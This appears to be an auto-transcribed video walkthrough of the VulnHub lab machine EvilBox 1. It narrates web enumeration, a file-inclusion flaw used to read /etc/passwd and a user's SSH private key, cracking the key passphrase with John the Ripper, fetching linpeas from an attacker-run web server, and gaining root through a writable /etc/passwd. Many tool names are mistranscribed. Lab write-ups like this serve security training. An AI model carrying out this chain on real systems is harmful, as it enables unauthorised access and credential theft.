Yo, what's going on, guys? In this video, we're going to be doing EvilBox 1 from VulnHub. This box is rated about solid, easy, and yeah, hope you guys enjoy. Alright, as always, we'll start by running a discover -r 10.0.0.1 for my gateway /24/IET0. Doing this, we could get the IP of the box 10.0.0.156. We're going to start by running an mmap scan, so I'll do mmap -SC for default scripts, -SV for enumeration. I'll scan all ports in the IP. Doing this, we can just let that scan. I'm just going to do a netcat minus NV on port 80. It does seem like port 80 is open for HTTP. Within the IP address, we do get the default Apache 2 Debian default page. I'm going to do control U to view the source code. And it does seem like it's just a default page, right? Looking at the ports, we do have port 22 open for SSH. We do have port 80 open for HTTP. It is running Apache, and this is running Debian, right? So we're going to start by running a GoBuster on here. Start by doing some enumeration. So I'm going to clear my terminal. I'm running GoBuster dir mode -u HTTP 10.0.0.156. I'm going to run user share wordless. We'll do dirbuster directory list 2.3 medium.txt. We'll do extensions as HTML, TXT, and also PHP. Doing this, we do get an index.html. We also do get a robots.txt. Here we just do get a hello hack store. I'm gonna start by opening a cherry tree. Opening a new node. I'm just gonna do enumeration. We'll just type in usernames or possible usernames, right? And we'll just put this as hackstore, right? So we do have that. Looking at our directories, we do have a directory discovered as secret. So we're gonna start by visiting secret. Visiting secret, I'm gonna do control U to view the source code, and it doesn't seem like we do have anything, right? So I'm gonna run a scan on, run a GoBuster on this, on /secret. So I'll do -w, and we can just type that in. And we do have a /secret, right? Doing this, probably with the username, we can start by maybe run a use Hydra to brute force for this user. But we did discover a evil.php, so let's start by visiting evil.php. I'm gonna do control U to view source code, and it doesn't seem like we do anything, right? I'm gonna test for like a simple file includer, so I'm gonna do like file / is equal to /etc password. If that doesn't work, I like doing a bunch of slashes. We'll do /etc password, and it doesn't seem to work, right? So I'm just going to copy the URL and use wfuzz to fuzz for the parameter. So I'm going to use wfuzz. We'll do -u. We'll just put this in quotation marks. Here we want to be fuzzing for the parameter, so I'm just going to put fuzz. It's going to equal to /etc password. We'll use -w for /user share wordless. We do have alify. We'll try by using we'll use alify params.txt. We'll do -hw, so we can just opt out for the parameter, right? Which has a different response than 0, right? So if it does have a different response than 0, then it's gonna just, we do know that that is our parameter for /etc password, because the data is going to be larger than 0, right? So you can press it on this, and it does seem like we did find a response for 200. And for the characters, you do see that's command, so we'll just try this for command. So we replace file, and you do see that we do get the /etc password, right? I'm gonna start by running a bin/bash, and it does seem like we do have a user as root, and also MOWRE. I'm gonna copy this, put this in my, we'll just put like official usernames. And we did know that we did have a username as Mori, right? Since we do know that there is a username, we can check under / like .bash history for that. So we'll just do question mark command is equal to slash home. We do know that the user is MOWREE. We could start by checking like bash underscore history. It doesn't seem like we have anything under there. We can try for checking for .ssh. We'll check like for the ID underscore RSA.pub. Doesn't seem like we do have anything under there, or slash ID underscore RSA.pub. We'll check for the private key. And it does seem like we actually do get a private key, right? So I'm just going to copy this and enter this to like a open new terminal. We'll VI into ID underscore RSA. Right, quit out of this. I'm also going to put this in my cherry tree, so we'll just put like keys. And we can put the private key in there, right? Look at this. We do have our private key. See, we can try to use, we got to make sure if we do have the public key on the server. So let's try checking for like authorize underscore keys. Authorize underscore keys. And it does seem like we do have the public key on here, right? So I'm going to try this private key with the public key. So I'm going to just do chmod 700 for ID underscore RSA. I will start by using SSH. So we're going to SSH into the user. So for the user, we did have MOWREE. So I'm going to SSH into that at 10.0.0.158. We'll do -I for ID underscore RSA. The IP address is 10.0.0.156. 156. You can type in yes. And it is asking for passphrase for the ID underscore 0. Since we do have a passphrase on here, we're going to be using SSH to John. So we'll use user share John, SSH to John. In this case, you do see that is asking for the private key. We do have the private key, which is ID underscore RSA. And we just need to output this to a ID underscore RSA hash.txt. Now we do have our hash.txt, right? We'll use John to crack this. We'll do alice -LA. We'll use John -- word list is equal to user share word list. We're going to be using rocku.txt. We'll specify our hash, which is ID underscore RSA hash.txt. Looking at this, we do get a password as unicorn. So we'll try to SSH with the same private key and use the password as unicorn. And you do see that we do get a unsuccessful as the user MOWRE, right? So we'll just run sudo -l. And it doesn't seem like you run, this is in Spanish, and it doesn't seem like we could run any commands, right? As sudo, right? So I'm just going to cd into /dev shm. We'll start by downloading some tools on here, some privacy tools. We can use like PSPY64 or linpiece. So I'm just going to run wget on here. So we'll do wget http 10.0.069. We'll do port 8080 and we'll just get our linpiece.sh. We'll go under our /documents. So we'll go into documents, cd into privilege escalation scripts. We'll go into, let's see, linpiece. We'll start a Python server. So do Python 3 -m http.server on port 8080. Since we're going to be getting from port 8080. We do have our linpiece.sh. We can press it around this. Now we do have our linpiece. We'll do chmod +x for linpiece. Run a linpiece and then we'll also output it to a, we'll just do output.txt. And we can just let this run. Okay, so this is now done running. We're just going to more into output.txt. Let me zoom out real quick. And we can start, see what linpiece has found for us, right? Right now, I'm just checking for any yellow or red highlighting under linpiece. So seems like we only have 2 users on here. We did have the SSH keys found. That's how we got into this user. We do have something yellow, which just seemed like it is writable by everybody. It's saying that /etc password is writable by everybody. So I'm gonna like do an analysis -LA on /etc password, and it does seem like this is writable by everyone, right? So I'm gonna vi into /etc password, and we does seem like we can right quit, right? I'm just gonna quit out of this, but it does seem like this is writable, right? Since this is writable, we're gonna trying to prevent to root using password. So I'm going to start by generating a hash. We'll do mk password -m for the method. We'll do SHA-512. I'm just going to enter password. And now we do have our hash, right? So I'm going to go into cherry tree. We'll just make a new line here. We'll just say mk password gen. Here we do have our hash. So we'll just make a new user as proxy programmer. We do have that. We also want to specify our IDs. So we're going to set the ID for 0, :0. We'll do /root /bin/bash. Delete the /root. So root, we have 00 for the group, root /root, and we're going to run a bin/bash. We're just going to copy this. Before doing that, we're going to be using wget to put the password file in here. So I usually like cutting out the /etc password file and copying all the users and making my own password file and replacing the users, right? So I'll do like mkdir for pass_file. We'll cd into pass_file. We'll vi into password. We'll paste the user in there. We'll just right quit out of this. It's basically the same users. For the hash. With hash, we'll just copy our hash that we did generate. We'll copy this, put this into the password file. We'll put this at the end of the line. Right quit. Now we'll start a Python source to Python 3 -m http.server on port 8080. We'll just port 8081. So now since we're going to put it under that directory, we need to switch to that directory. Make sure we do have the password file. So do wget http 10.0.069 8081, and we're going to get our password file. We'll just try to output this to password, and we'll try to cat the password file. And you do see that we do have the user as proxy programmer, right? So we'll just cd into proxy programmer. We'll do password. Now we are under root, so we check our IDs. We do have the group ID for root, right? So we can cat our root.txt. And now that there's our root.txt. So guys, that's pretty much in the video. Don't forget to like and subscribe. And I'll catch you guys in the next one. Peace.